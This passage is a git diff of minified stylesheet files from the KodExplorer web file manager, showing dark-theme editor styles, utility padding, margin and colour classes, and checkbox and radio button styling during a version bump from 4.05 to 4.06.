a.select{background:#666666;color:#fff;}.code-theme-black .search-content .aui-icon,.code-theme-black .search-content .aui-main{background:#333;}.code-theme-black .search-content .aui-state-no-title .aui-inner{border:1px solid #666666;}.code-theme-black .ace-text-input{background:#333;}.code-theme-black .ace_search{background-color:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_button{border:1px solid #595959;color:#fff;}.code-theme-black .ace_search .ace_button:hover{background-color:#595959;}.code-theme-black .ace_search .ace_button.checked{border-color:#39F;background:#39f;color:#fff;}.code-theme-black .ace_search .ace_search_field{background-color:#595959;border:1px solid #595959;color:#eef;}.code-theme-black .ace_search .ace_search_form.ace_nomatch .search-info{color:#f66;}.code-theme-black .ace_search .btn-background{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .btn-background-hover{background:#595959;border-color:#666666;}.code-theme-black .ace_search .ace_searchbtn,.code-theme-black .ace_search .ace_replacebtn{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_searchbtn:hover,.code-theme-black .ace_search .ace_replacebtn:hover{background:#595959;border-color:#666666;}.code-theme-black .ace_search .ace_searchbtn.next,.code-theme-black .ace_search .ace_replacebtn.next{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_searchbtn.next:hover,.code-theme-black .ace_search .ace_replacebtn.next:hover{background:#595959;border-color:#666666;}.code-theme-black .ace_search .ace_searchbtn.prev,.code-theme-black .ace_search .ace_replacebtn.prev{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_searchbtn.prev:hover,.code-theme-black .ace_search .ace_replacebtn.prev:hover{background:#595959;border-color:#666666;}.code-theme-black .introduction{background:#3d3d3d;top:59px;}.code-theme-black .introduction pre{background:#3d3d3d;border-bottom:1px solid #474747;}.code-theme-black .introduction .tips h1{border-bottom:1px dashed #3d3d3d;}.code-theme-black .introduction .green{border-left:1px solid #3d3d3d;}.code-theme-black .context-menu-list .gotoline-input input{color:#eef;background:#666666;broder-color:#474747;}.code-theme-black .code-mode-list{background:#474747;color:#eef;}.code-theme-black .code-mode-list li.list-input{background:#474747;}.code-theme-black .code-mode-list li.list-input input{color:#eef;background:#666666;broder-color:#474747;}.code-theme-black .code-mode-list li.selected,.code-theme-black .code-mode-list li.selected.hover,.code-theme-black .code-mode-list li.hover{background:#666666;color:#fff;}.forceWap .edit-right-frame{width:0 !important;display:none;}.forceWap .resize{display:none;}.forceWap .ace_editor{width:100% !important;}.forceWap .edit-tab{display:none;}.forceWap .ace_search{top:29px;}.forceWap .ace_scroller{left:30px !important;}.forceWap .ace_gutter,.forceWap .ace_gutter-layer{width:30px !important;}.forceWap .ace_folding-enabled > .ace_gutter-cell{padding:0px 3px !important;}.forceWap .ace-editor-content{font-size:12px !important;}.forceWap .top-toolbar a[action="saveall"],.forceWap .top-toolbar a[action="refresh"],.forceWap .top-toolbar .menu-view-goto-line{display:none;}@media screen and (max-width:600px){.topbar .content .top-right{ display:none;}} +/* ver 4.06(2017-08-30) [build 1504100992.2182] */ \ No newline at end of file diff --git a/static/style/skin/base/app_desktop.css b/static/style/skin/base/app_desktop.css index 210f2a4..5227be9 100755 --- a/static/style/skin/base/app_desktop.css +++ b/static/style/skin/base/app_desktop.css @@ -1,4 +1,4 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738068.0793] */ -body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} 